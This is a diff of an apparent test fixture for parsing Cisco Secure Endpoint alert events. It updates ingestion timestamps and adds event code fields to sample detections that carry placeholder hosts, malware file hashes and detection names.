                 "action": "Threat Detected",
                 "id": "6180352115244794000",
@@ -292,8 +294,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619286777Z",
+                "ingested": "2021-09-30T00:14:16.070130825Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6180351977805840000",
@@ -379,8 +382,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619288557Z",
+                "ingested": "2021-09-30T00:14:16.070132933Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6159258594551267000",
@@ -491,11 +495,12 @@
             },
             "event": {
                 "severity": 3,
-                "action": "DFC Threat Detected",
-                "ingested": "2021-09-27T00:41:08.619290355Z",
+                "ingested": "2021-09-30T00:14:16.070135066Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
-                "id": "6180341055704007000",
-                "kind": "alert"
+                "code": "1090519084",
+                "kind": "alert",
+                "action": "DFC Threat Detected",
+                "id": "6180341055704007000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -601,11 +606,12 @@
             },
             "event": {
                 "severity": 3,
-                "action": "DFC Threat Detected",
-                "ingested": "2021-09-27T00:41:08.619292104Z",
+                "ingested": "2021-09-30T00:14:16.070137162Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
-                "id": "6180341055704007000",
-                "kind": "alert"
+                "code": "1090519084",
+                "kind": "alert",
+                "action": "DFC Threat Detected",
+                "id": "6180341055704007000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -711,11 +717,12 @@
             },
             "event": {
                 "severity": 3,
-                "action": "DFC Threat Detected",
-                "ingested": "2021-09-27T00:41:08.619293833Z",
+                "ingested": "2021-09-30T00:14:16.070139211Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
-                "id": "6180341055704007000",
-                "kind": "alert"
+                "code": "1090519084",
+                "kind": "alert",
+                "action": "DFC Threat Detected",
+                "id": "6180341055704007000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -821,11 +828,12 @@
             },
             "event": {
                 "severity": 3,
-                "action": "DFC Threat Detected",
-                "ingested": "2021-09-27T00:41:08.619295558Z",
+                "ingested": "2021-09-30T00:14:16.070141304Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
-                "id": "6180341055704007000",
-                "kind": "alert"
+                "code": "1090519084",
+                "kind": "alert",
+                "action": "DFC Threat Detected",
+                "id": "6180341055704007000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -931,11 +939,12 @@
             },
             "event": {
                 "severity": 3,
-                "action": "DFC Threat Detected",
-                "ingested": "2021-09-27T00:41:08.619297337Z",
+                "ingested": "2021-09-30T00:14:16.070143371Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
-                "id": "6180341055704007000",
-                "kind": "alert"
+                "code": "1090519084",
+                "kind": "alert",
+                "action": "DFC Threat Detected",
+                "id": "6180341055704007000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1041,11 +1050,12 @@
             },
             "event": {
                 "severity": 3,
-                "action": "DFC Threat Detected",
-                "ingested": "2021-09-27T00:41:08.619299094Z",
+                "ingested": "2021-09-30T00:14:16.070145466Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}",
-                "id": "6180341055704007000",
-                "kind": "alert"
+                "code": "1090519084",
+                "kind": "alert",
+                "action": "DFC Threat Detected",
+                "id": "6180341055704007000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1119,8 +1129,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:08.619300818Z",
+                "ingested": "2021-09-30T00:14:16.070147485Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-15T10:32:58.000Z",
                 "action": "Cloud IOC",
@@ -1214,8 +1225,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619302894Z",
+                "ingested": "2021-09-30T00:14:16.070149770Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533671385032557000",
@@ -1292,8 +1304,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:08.619304755Z",
+                "ingested": "2021-09-30T00:14:16.070151856Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}",
+                "code": "1107296258",
                 "kind": "alert",
                 "start": "2021-01-15T10:24:58.000Z",
                 "action": "Multiple Infected Files",
@@ -1384,8 +1397,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619306521Z",
+                "ingested": "2021-09-30T00:14:16.070153909Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533670191031648000",
@@ -1469,8 +1483,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619308263Z",
+                "ingested": "2021-09-30T00:14:16.070155934Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533670191031648000",
@@ -1554,8 +1569,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:08.619310004Z",
+                "ingested": "2021-09-30T00:14:16.070157953Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6533670191031648000",
